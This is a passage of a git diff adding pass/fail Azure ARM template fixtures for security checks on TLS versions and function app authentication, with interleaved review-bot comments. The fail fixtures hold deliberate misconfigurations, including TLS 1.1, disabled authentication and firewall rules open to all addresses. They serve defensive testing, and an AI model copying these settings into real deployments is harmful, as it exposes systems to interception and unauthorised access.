"acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": 
"string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": true, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + 
"vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json new file mode 100644 index 00000000000..4a5965c74df --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "fail", + "location": "[resourceGroup().location]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]", + "siteConfig": { + "minTlsVersion": "1.1" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json new file mode 100644 index 00000000000..c74057282fe --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json 
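Review bot: The `keyType` parameter in pass2.json defaults to `"RSA"` but its `allowedValues` list omits `"RSA"` (pass.json still lists it), so the default lies outside the allowed set and Azure would reject the template at deployment; this looks like a line dropped when the file was copied, and restoring `+ "RSA",` between `"EC-HSM"` and `"RSA-HSM"` fixes it. The check presumably reads only `siteConfig.http20Enabled`, so the Key Vault parameters and the `outputs.proxyKey` reference to a `Microsoft.KeyVault/vaults/keys` resource that is never declared in `resources` are dead weight in both pass fixtures; trimming them would make the expected verdict easier to read.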
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.1"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json
new file mode 100644
index 00000000000..0dbbafaebb0
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.2"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json
new file mode 100644
index 00000000000..b81f1b491f8
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": 1.2
+ }
+ }
+ }
+ ]
+}
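Review bot: pass2.json sets `"minTlsVersion": 1.2` as a JSON number, whereas the ARM schema for `siteConfig.minTlsVersion` takes the version as a string (`"1.2"`, as pass.json and pass3.json do), so this fixture and pass4.json in the next hunk exercise the check's tolerance for a non-string value rather than a deployable template. If that coercion is intentional, a file name such as `pass_numeric.json` would make the intent visible, since JSON fixtures cannot carry comments. None of the six fixtures omits `minTlsVersion` from `siteConfig`; whether an absent property should pass or fail depends on the check's default handling, and a fixture pinning that would catch a regression there.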
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json
new file mode 100644
index 00000000000..a21270870cc
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "pass3",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.2"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json
new file mode 100644
index 00000000000..93359bab29f
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "pass4",
+ "location": "[resourceGroup().location]",
+ "kind": "functionapp,linux",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": 1.2
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json
new file mode 100644
index 00000000000..ef062880598
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/config",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "properties": {
+ "httpSettings": {
+ "forwardProxy": {
+ "convention": "Custom"
+ }
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json
new file mode 100644
index 00000000000..f4c0e45858a
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/config",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "properties": {
+ "httpSettings": {
+ "forwardProxy": {
+ "convention": "Custom"
+ }
+ },
+ "platform": {
+ "enabled": false
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json
new file mode 100644
index 00000000000..36a15504964
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/config",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "properties": {
+ "httpSettings": {
+ "forwardProxy": {
+ "convention": "Custom"
+ }
+ },
+ "platform": {
+ "enabled": true
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
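Review bot: All three `Microsoft.Web/sites/config` fixtures use a bare `"name"` (`fail`, `fail2`, `pass`) rather than the `<site>/authsettingsV2` form ARM requires for this child resource, so they never exercise how the check tells the authentication settings apart from other `sites/config` children such as `web` or `appsettings`; if the check keys on the name suffix, a fixture holding a non-auth config resource that must be skipped would pin that behaviour. fail.json is expected to fail only because `platform` is absent, which relies on the check treating a missing `platform.enabled` as disabled — worth confirming that is the intended default. The three files also end without a trailing newline.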
diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json
new file mode 100644
index 00000000000..34dcc4540d4
--- /dev/null
+++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json
@@ -0,0 +1,246 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string" + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": {} + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": 
"[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers", + "apiVersion": "2023-05-01-preview", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "identity": { + "type": "string", + "userAssignedIdentities": { + "{customized property}": {} + } + }, + "properties": { + "administratorLogin": "string", + "administratorLoginPassword": "string", + "administrators": { + "administratorType": "ActiveDirectory", + "azureADOnlyAuthentication": "bool", + "login": "string", + "principalType": "string", + "sid": "string", + "tenantId": "string" + }, + "federatedClientId": "string", + "isIPv6Enabled": "string", + "keyId": "string", + "minimalTlsVersion": "1.1", + "primaryUserAssignedIdentityId": "string", + "publicNetworkAccess": "string", + "restrictOutboundNetworkAccess": "string", + "version": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": 
"[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": 
"Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json new file mode 100644 index 00000000000..5244f95722e --- /dev/null +++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json 
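Review bot: Apart from `"minimalTlsVersion": "1.1"` on the `Microsoft.Sql/servers` resource, fail.json is a MySQL flexible-server template: all three `Microsoft.Resources/deployments` entries depend on `Microsoft.DBforMySQL/flexibleServers/<serverName>`, which is never declared in `resources`, so the template would not deploy and roughly 200 lines of unrelated parameters and nested deployments obscure the one property under test; pass.json in the next hunk is the same template with `"1.2"`. Trimming both fixtures to the `Microsoft.Sql/servers` resource would make them read as their directory name suggests. There is also no fixture for a server that omits `minimalTlsVersion`, whose verdict depends on the check's default handling and is worth pinning.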
@@ -0,0 +1,246 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string" + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": {} + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": 
"[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers", + "apiVersion": "2023-05-01-preview", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "identity": { + "type": "string", + "userAssignedIdentities": { + "{customized property}": {} + } + }, + "properties": { + "administratorLogin": "string", + "administratorLoginPassword": "string", + "administrators": { + "administratorType": "ActiveDirectory", + "azureADOnlyAuthentication": "bool", + "login": "string", + "principalType": "string", + "sid": "string", + "tenantId": "string" + }, + "federatedClientId": "string", + "isIPv6Enabled": "string", + "keyId": "string", + "minimalTlsVersion": "1.2", + "primaryUserAssignedIdentityId": "string", + "publicNetworkAccess": "string", + "restrictOutboundNetworkAccess": "string", + "version": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": 
"[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": 
"Microsoft.DBforMySQL/flexibleServers/configurations",
+ "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+ "apiVersion": "[variables('api')]",
+ "properties": {
+ "value": "[variables('serverParameters')[copyIndex()].value]",
+ "source": "[variables('serverParameters')[copyIndex()].source]"
+ }
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json
new file mode 100644
index 00000000000..af482998d76
--- /dev/null
+++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json
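Review bot: The `Microsoft.Sql/servers` resource named `pass` is the only resource this fixture needs, yet the three nested `Microsoft.Resources/deployments` that follow carry `dependsOn` entries for `Microsoft.DBforMySQL/flexibleServers/...` resources that are not declared anywhere in this template, so the file is not a deployable ARM template and reads as a leftover from the MySQL flexible-server fixture. I would cut the fixture down to the `Microsoft.Sql/servers` resource and drop the now-unused `firewallRules`, `serverParameters` and `aadData` parameters, so a reader sees exactly what the check exercises. The pass case pins only an explicit `"minimalTlsVersion": "1.2"`; a sibling fixture that omits the property would pin what the check does when the attribute is missing, which I cannot tell from this file.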
@@ -0,0 +1,257 @@ + +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "1923296876861958074" + } + }, + "parameters": { + "serverName": { + "type": "string", + "metadata": { + "description": "Server Name for Azure database for MySQL" + } + }, + "administratorLogin": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Database administrator login name" + } + }, + "administratorLoginPassword": { + "type": "securestring", + "minLength": 8, + "metadata": { + "description": "Database administrator password" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)" + } + }, + "skuName": { + "type": "string", + "defaultValue": "GP_Gen5_2", + "metadata": { + "description": "Azure database for MySQL sku name " + } + }, + "SkuSizeMB": { + "type": "int", + "defaultValue": 5120, + "metadata": { + "description": "Azure database for MySQL Sku Size " + } + }, + "SkuTier": { + "type": "string", + "defaultValue": "GeneralPurpose", + "allowedValues": [ + "Basic", + "GeneralPurpose", + "MemoryOptimized" + ], + "metadata": { + "description": "Azure database for MySQL pricing tier" + } + }, + "skuFamily": { + "type": "string", + "defaultValue": "Gen5", + "metadata": { + "description": "Azure database for MySQL sku family" + } + }, + "mysqlVersion": { + "type": "string", + "defaultValue": "8.0", + "allowedValues": [ + "5.6", + "5.7", + "8.0" + ], + "metadata": { + "description": "MySQL version" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + }, + "backupRetentionDays": { + "type": "int", + "defaultValue": 7, + "metadata": { + "description": "MySQL Server backup retention days" + } + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": "Disabled", + "metadata": { + "description": "Geo-Redundant Backup setting" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "azure_mysql_vnet", + "metadata": { + "description": "Virtual Network Name" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "azure_mysql_subnet", + "metadata": { + "description": "Subnet Name" + } + }, + "virtualNetworkRuleName": { + "type": "string", + "defaultValue": "AllowSubnet", + "metadata": { + "description": "Virtual Network RuleName" + } + }, + "vnetAddressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Virtual Network Address Prefix" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Subnet Address Prefix" + } + } + }, + "variables": { + "firewallrules": [ + { + "Name": "rule1", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + }, + { + "Name": "rule2", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + } + ] + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]", + "properties": { + "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "ignoreMissingVnetServiceEndpoint": true + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]", + "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]" + ] + }, + { + "type": 